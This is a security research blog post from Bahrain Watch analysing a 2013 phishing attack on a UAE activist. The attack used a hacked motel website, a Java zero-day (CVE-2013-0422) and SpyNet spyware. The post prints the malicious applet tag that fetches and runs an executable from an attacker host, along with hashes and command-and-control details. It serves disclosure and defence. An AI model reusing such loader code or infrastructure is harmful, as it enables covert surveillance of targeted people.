Posted by & filed under AmanTech, Spy Watch.


Early in the morning on January 13, 2013, Bahrain Watch was contacted by an activist in the United Arab Emirates.  This individual had received a suspicious-looking e-mail containing a link to a video involving Dubai’s Chief of Police.


The Video Link

The video link pointed to the following website, whose URL is apparently designed to sort of look like that of a YouTube video: http://cedarkeyrv.com/v2flashslideshow/watchv=Vpalz_trJdK.html.

Clicking on the link displayed the following in a web browser for around thirty seconds, before refreshing to load a YouTube video:

loadingvideo

 

Inspection of the HTML source code of the page revealed that it contained an embedded Java applet:

<APPLET code='NewApplet.class' archive='JavaApplication3.jar' >
<param name='x' value='http://isteeler.com/ini.exe'>
</APPLET>


The Java Applet

Bahrain Watch downloaded and decompiled the Java Applet, and found it to be an instance of the recent zero-day Java exploit, CVE-2013-0422.  The exploit has been widely reported in the media.  Based on the exploit, the Department of Homeland Security advised users to temporarily disable the Java plugin in their web browser.  The Java vulnerability was still unpatched when the activist in the UAE received this e-mail.  Oracle released a fix around twelve hours later.

The particular flavor of the exploit seems slightly different than the version seen on Metasploit, though it is similar to other versions of the exploit found on Google.  In particular, the flavor used here loads the class file from a hex-encoded string named ByteArrayWithSecOff, as opposed to a .class file within the .jar file.  The hash of the exploit is:

MD5: c04b3896d36ca975cda8c8446ed33c0d
SHA1: 5dc7097896c98a5871674015436aedd7a6b48e63
SHA256: bfadf79b639716ee6c3858d0b298c35dcc7fd7d472cdc512a7dc8009321df737


The corresponding VirusTotal analysis shows a detection rate of 6/46.

The exploit downloads whatever URL is specified in the applet parameter “x” on the webpage that embeds the Java applet.  In this case, the URL is:

http://isteeler.com/ini.exe


That URL is still available as of the time of this posting.  The exploit materializes the downloaded payload to a temporary folder on disk, as “JUPDATE.exe.”  The exploit then executes the payload.

 

The Payload

The hash of the payload is:

MD5: e5dc7ecfc5578d51ba92ff710b05ae09
SHA1: 1689a8af161ad5a1696a0f9982693d3fbb95a99f
SHA256: d0cd80cb28f52cab3ec61bf89f98f4601a27074d98c4828736898a287acacb74


The corresponding VirusTotal analysis shows a detection rate of 5/40.

The payload is a PE file that appears to be packed with ASProtect v1.23 RC1.  The unpacked binary (unpacked with QuickUnpack 2.2) appears to contain a compiled Delphi project.  A full analysis was not performed due to time constraints.  Based on a memory image of an infected computer, the payload appears to be similar to the SpyNet Remote Administration Toolkit, or a piece of spyware derived from the SpyNet source code.  SpyNet reportedly offers a full suite of functionality on a victim’s computer to the attacker, including keylogging and password stealing, viewing a victim’s screen, and turning on a victim’s webcam.  The following were among the strings found in the memory image:

XX--XX--XX.txt
XX-XX-XX.txt
SPY_NET_RATMUTEX
_x_X_PASSWORDLIST_X_x_
_x_X_UPDATE_X_x_
_x_X_BLOCKMOUSE_X_x_
NOIP.abc
MSN.abc
FIREFOX.abc
IELOGIN.abc
IEPASS.abc
IEAUTO.abc
IEWEB.abc
UuU.uUu
XxX.xXx


SpyNetCoder — the individual who writes SpyNet — apparently offered to sell a version of his source code for $300.  Binary versions of SpyNet are also apparently available for 50 Euros.

The Command & Control server associated with this payload is:

storge.myftp.org:15999


This domain name, in combination with several different ports, has been used many times over the past three months in attacks on UAE activists.  As of the time of this writing, that domain name resolves to:

109.169.17.234
SDN Systems Pte Ltd
8 Wilkie Road
#03-01 Wilkie Edge
Singapore
GB

 

 

The Hacked Website

The domain name of the website that ran the Java exploit was http://cedarkeyrv.com/, which is the website for the “Cedar Key Sunset Isle RV Park & Motel,” an “RV Bed and Breakfast” establishment in Cedar Key, Florida.  The term “RV” stands for “Recreational Vehicle,” and refers to a vehicle that contains amenities such as a kitchen, bed, and bathroom.  According to the site:

The Sunset Isle RV Park and Motel of Cedar Key, Florida offers the finest and friendliest RV park, campground and motel you’ll find in the Cedar Key vicinity.

The site was compromised by a hacker, who added the exploit to the website.  The following is a sample directory listing from the hacked site, showing the files uploaded by the hacker:

v2flashslideshow1-small


The hacker also inserted the exploit into the homepage of cedarkeyrv.com.  Thus, individuals who were not specifically targeted were also infected if they visited the Cedar Key homepage.

Bahrain Watch contacted the hosting company, Journey1, and alerted them to the hack.  They investigated, found, and removed other instances of the exploit on the same website.  All instances of the exploit on the website that Bahrain Watch detected have since been removed.

The website isteeler.com is still hosting the same exploit on its homepage.  This website may belong to the attackers.  Bahrain Watch has contacted Namecheap hosting, asking them to take down the website.


The Big Picture

Bahrain Watch believes that the UAE Government is behind ongoing attacks on UAE activists, including this attack.  This is the first instance of a cyberattack against UAE or Bahraini activists that has involved the compromise of a third-party website, as far as Bahrain Watch is aware.

Those who operate in a way that is contrary to the Government’s political wishes in the UAE and Bahrain are under constant attack from a number of threats, including spyware.  Bahrain Watch advises Internet users to avoid clicking on unsolicited links, or opening unsolicited e-mail attachments, even those purportedly from friends.  If you do receive a suspicious e-mail or link, please contact [email protected].  Forwarding suspicious links and attachments helps us protect others.

Comments are closed.